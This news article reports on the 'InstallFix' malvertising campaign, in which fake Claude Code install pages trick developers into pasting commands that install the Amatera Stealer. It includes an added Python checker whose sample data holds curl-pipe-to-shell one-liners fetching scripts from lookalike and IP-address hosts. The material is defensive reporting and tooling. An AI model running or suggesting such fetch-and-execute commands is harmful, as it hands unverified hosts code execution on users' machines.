'InstallFix' Attacks Spread Fake Claude Code Sites
A fresh cyberattack campaign blends malvertising with a ClickFix-style technique that highlights risky behavior with AI coding assistants and command-line interfaces.
Rob Wright, Senior News Director, Dark Reading
March 9, 2026
A new variation of the ClickFix technique is capitalizing on the popularity of Anthropic's Claude Code and other AI coding tools.
Researchers at Push Security discovered the threat campaign, which combines malvertising with a social engineering attack. The research team found fake install pages for Claude Code were spreading exclusively through Google-sponsored links for searches such as "Claude Code," "Claude Code install," and "Claude Code CLI."
The cloned installation pages for Anthropic's coding assistant are near-identical to the real thing, Jacques Louw, Push Security co-founder and chief product officer (CPO), explained in a blog post published Friday. But when victims copy the malicious install commands from the cloned sites, they deploy the Amatera Stealer malware, which could swipe developers' credentials and give attackers access to enterprise development environments.
While there's nothing revolutionary about this approach, which Push Security calls "InstallFix," Louw explained that attackers have recognized the increased tendency among users to simply copy and paste commands into their systems and execute them. The attacks highlight an insecure practice that has, unfortunately, become the norm these days.
"There was a time, not that long ago, when pasting a command from a website straight into your terminal was something you'd only try once before some grizzled senior engineer beat it out of you," Louw wrote. "That's because you're effectively handing a website a blank cheque to execute whatever it wants on your system."
ClickFix & CLI Tools Make a Dangerous Match
ClickFix is a widely used social engineering technique that typically delivers error messages of some kind to convince unsuspecting users to execute malicious commands. The error messages typically feature fake browser updates, but variations of the technique have used everything from phony Blue Screens of Death to audio errors for fake job interviews conducted over videoconferencing.
InstallFix, however, might be the most apt variant yet because it targets a class of user that's probably comfortable with copying and pasting commands. Like many AI coding assistants, Louw explained, Anthropic's recommended install method for Claude Code is pasting and executing a one-line command in a system terminal.
And it's not just AI-coding assistants; Louw wrote that hundreds of the most popular developer and command-line interface (CLI) tools ship with the same installation instructions. Attackers know that this has become a standard practice and are now exploiting it.
"The entire security model boils down to 'trust the domain.' And with AI adoption encouraging more non-technical users to work with the kind of tools that only devs used to use, this suddenly becomes a threat to a much larger, less security conscious pool of users," Louw wrote.
Capitalizing on Claude Code
According to Push Security, malicious Google ads are an ideal delivery mechanism because, unlike phishing emails, the malicious links won't be caught by email security scans. Plus, the attackers are taking advantage of the increasing interest in Claude Code with the sponsored search results, which appear above organic search results and could fool users who quickly click on a link without realizing it's an ad.
While the InstallFix campaign may seem like it's tailored to take advantage of shadow AI adoption and inexperienced coders, Louw tells Dark Reading that's not necessarily the case. The threat actors behind the campaign are targeting a mainstream AI tool that is likely already in use in many organizations, and the risky path a user takes to install the tool, he says. The scheme can affect both experienced developers and amateur vibe-coders.
"I suspect this campaign is targeting Claude Code specifically, because it's one of the tools (if not the tool) being adopted the fastest across the board," he says. "This is mirrored by the high rate of new account creations we see across our customers for Anthropic products."
Push Security warned that in addition to abusing Google's sponsored links, the threat actors behind the InstallFix attacks are using domains from legitimate providers such as Cloudflare Pages, Tencent EdgeOne, and Squarespace, which appear innocuous and blend in with normal traffic activity. Louw said such abuse has been a common theme that Push Security has observed across virtually every phishing site and malicious link these days.
Users should be extremely cautious when copying and pasting commands into their terminals and should take additional time to verify that the domains providing such commands are in fact authentic. While Push Security provided indicators of compromise (IoCs) for the InstallFix attacks, Louw said the data has limited value because domains for campaigns like this one tend to have a short lifespan.
"This is a fast-moving situation, with domains constantly being spun up," he wrote.
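The domain check recommended above can be made mechanical before anything is pasted into a terminal. The following is an added example, not code from the article, Push Security or Anthropic: it pulls every URL out of a copied install one-liner and accepts it only if the host exactly matches an allowlist verified out-of-band. The function name, the placeholder host `install.vendor.example` and the sample commands are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: installer hosts verified out-of-band (vendor docs reached from a
# bookmark, not a search ad). Placeholder value, not a real vendor domain.
TRUSTED_INSTALL_HOSTS = frozenset({"install.vendor.example"})

# URLs as they appear inside a pasted shell one-liner.
URL_RE = re.compile(r"https?://[^\s'\"|;()<>]+", re.IGNORECASE)


def vet_install_command(cmd, trusted=TRUSTED_INSTALL_HOSTS):
    """Return a list of findings; an empty list means every download URL in
    the pasted command is HTTPS and its host exactly matches the allowlist."""
    findings = []
    urls = URL_RE.findall(cmd)
    if not urls:
        findings.append("no URL found: cannot tell where the code comes from")
    for url in urls:
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower().rstrip(".")
        except ValueError:
            findings.append(f"unparseable URL: {url}")
            continue
        if parts.scheme.lower() != "https":
            findings.append(f"non-HTTPS download: {url}")
        if "@" in parts.netloc:
            # https://trusted-name@other-host/ displays the trusted name first
            findings.append(f"userinfo before real host {host!r}: {url}")
        if host.startswith("xn--") or ".xn--" in host or not host.isascii():
            findings.append(f"punycode or non-ASCII host: {host}")
        # Exact match only: substring or suffix tests pass lookalikes such as
        # a trusted name used as a subdomain label on a free hosting platform.
        if host not in trusted:
            findings.append(f"host not on allowlist: {host}")
    return findings


if __name__ == "__main__":
    # Constructed sample commands, not taken from the campaign.
    samples = [
        "curl -fsSL https://install.vendor.example/install.sh | bash",
        "curl -fsSL https://install.vendor.example.pages.dev/install.sh | bash",
        "curl -fsSL https://install.vendor.example@203.0.113.7/i.sh | sh",
    ]
    for s in samples:
        print(s, "->", vet_install_command(s) or "ok")
```

An empty result only confirms where the script would be fetched from; downloading it to a file and reading it before execution remains a separate step.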
About the Author
Rob Wright
Senior News Director, Dark Reading
Rob Wright is a longtime reporter with more than 25 years of experience as a technology journalist. Prior to joining Dark Reading as senior news director, he spent more than a decade at TechTarget's SearchSecurity in various roles, including senior news director, executive editor and editorial director. Before that, he worked for several years at CRN, Tom's Hardware Guide, and VARBusiness Magazine covering a variety of technology beats and trends. Prior to becoming a technology journalist in 2000, he worked as a weekly and daily newspaper reporter in Virginia, where he won three Virginia Press Association awards in 1998 and 1999. He graduated from the University of Richmond in 1997 with a degree in journalism and English. A native of Massachusetts, he lives in the Boston area.